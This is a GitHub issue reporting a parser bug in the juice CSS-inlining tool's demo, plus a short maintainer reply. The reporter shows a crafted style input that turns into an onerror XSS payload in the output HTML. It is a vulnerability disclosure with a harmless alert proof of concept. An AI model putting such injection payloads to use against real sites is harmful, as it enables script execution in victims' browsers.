Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Parser bug, allowing XSS from CSS (On demo) #388

Open
NDevTK opened this issue Oct 16, 2021 · 2 comments
Open

Parser bug, allowing XSS from CSS (On demo) #388

NDevTK opened this issue Oct 16, 2021 · 2 comments

Comments

@NDevTK
Copy link

NDevTK commented Oct 16, 2021
edited
Loading

The following input tested on https://automattic.github.io/juice/

<style>audio{a" onerror=alert(document.domain)>":""}</style>
<audio src=""></audio>

Resulted in the valid XSS payload

<audio src="" style="a" onerror=alert(document.domain)>": '';"></audio>

From what I can tell juiceDocument is not affected.
@NDevTK NDevTK changed the title Parser bug allowing XSS from CSS Parser bug for allowing XSS from CSS Oct 16, 2021
@NDevTK NDevTK changed the title Parser bug for allowing XSS from CSS Parser bug, allowing XSS from CSS Oct 16, 2021
@jrit
Copy link
Collaborator

jrit commented Oct 18, 2021

Related #251 and worth calling out here again the version running on the github page is much older than the version on npm

@NDevTK
Copy link
Author

NDevTK commented Oct 19, 2021
edited
Loading

Yeah it would be useful for the demo to be on the latest version.
I also noticed this is not on https://github.com/Automattic/juice/security/advisories

@NDevTK NDevTK changed the title Parser bug, allowing XSS from CSS Parser bug, allowing XSS from CSS (On demo) Oct 24, 2021
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@jrit @NDevTK